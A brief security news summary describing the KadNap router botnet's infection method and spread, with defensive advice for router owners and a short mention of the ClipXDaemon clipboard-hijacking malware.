A new malware called KadNap has been discovered that primarily targets Asus routers to enlist them into a botnet. The malware, first detected in August 2025, has infected over 14,000 devices with more than 60% located in the US. It uses a custom version of the Kademlia Distributed Hash Table (DHT) protocol to evade traditional network monitoring and is being used to create a proxy service that claims to offer anonymous access.
The malware works by downloading a shell script from a command-and-control server, which creates a cron job to run the script every hour. The script pulls in a malicious ELF file, executes it, and deploys KadNap. It also connects to an NTP server to fetch the current time and store it along with the host uptime.
The malware is capable of targeting devices running both ARM and MIPS processors and has been found to target edge networking devices beyond just Asus routers. The Black Lotus Labs team advises users to keep their SOHO routers up to date, reboot them regularly, change default passwords, secure management interfaces, and replace models that are end-of-life.
Another new Linux threat, ClipXDaemon, has also emerged, which targets cryptocurrency users by intercepting and altering copied wallet addresses. It’s designed to be stealthy and can target multiple cryptocurrencies.
Source: https://thehackernews.com/2026/03/kadnap-malware-infects-14000-edge.html